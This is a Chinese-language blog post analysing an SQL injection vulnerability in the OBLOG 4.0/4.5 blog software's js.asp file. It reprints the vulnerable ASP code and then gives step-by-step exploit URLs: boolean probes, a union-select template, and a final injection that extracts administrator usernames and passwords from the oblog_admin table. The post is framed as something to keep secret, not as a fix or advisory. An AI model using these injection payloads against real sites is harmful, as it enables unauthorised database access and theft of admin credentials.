OBLOG4.0 OBLOG4.5漏洞利用分析(ob_implicit_flush)不要告诉别人

随心笔谈2年前发布 编辑
170 0
🌐 经济型:买域名、轻量云服务器、用途:游戏 网站等 《腾讯云》特点:特价机便宜 适合初学者用 点我优惠购买
🚀 拓展型:买域名、轻量云服务器、用途:游戏 网站等 《阿里云》特点:中档服务器便宜 域名备案事多 点我优惠购买
🛡️ 稳定型:买域名、轻量云服务器、用途:游戏 网站等 《西部数码》 特点:比上两家略贵但是稳定性超好事也少 点我优惠购买


来源:Deepen Study

漏洞文件:js.asp

<%

Dim oblog

set oblog=new class_sys

oblog.autoupdate=False

oblog.start

dim js_blogurl,n

js_blogurl=Trim(oblog.CacheConfig(3))

n=CInt(Request(”n”))

if n=0 then n=1

select case CInt(Request(”j”))

case 1

call tongji()

case 2

call topuser()

case 3

call adduser()

case 4

call listclass()

case 5

call showusertype()

case 6

call listbestblog()

case 7

call showlogin()

case 8

call showplace()

case 9

call showphoto()

case 10

call showblogstars()

Case 11

Call show_hotblog()

Case 12

Call show_teams()

Case 13

Call show_posts()

Case 14

Call show_hottag()

case 0

call showlog()

end select

****************省略部分代码******************

Sub show_posts()

Dim teamid,postnum,l,u,t

teamid=Request(”tid”)

postnum=n

l=CInt(Request(”l”))

u=CInt(Request(”u”))

t=CInt(Request(”t”))

Dim rs,sql,sRet,sAddon

Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”

If teamid<>“” And teamid<>“0″ Then

teamid=Replace(teamid,”|”,”,”)

Sql=Sql & ” And teamid In (” & teamid & “) ”

End If

Sql=Sql & ” order by postid Desc”

Set rs=oblog.Execute(Sql)

sRet=”

 ”

 Do While Not rs.Eof

 sAddon=””

 * sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”

 If u=1 Then sAddon=rs(4)

 if t=1 Then

 If sAddon<>“” Then sAddon=sAddon & “,”

 sAddon=sAddon & rs(3)

 End If

 If sAddon<>“” Then sAddon=”(” & sAddon & “)”

 sRet=sRet & sAddon & “

 ”

 rs.Movenext

 Loop

 Set rs = Nothing

 sRet=sRet & “

Response.write oblog.htm2js (sRet,True)

End Sub

调用show_posts()过程必须要符合上面的参数n=1,j=13

(” & teamid & “)

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常

猜管理员表名

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1

Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1

document.write(‘

*

‘);

gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1 

© 版权声明

相关文章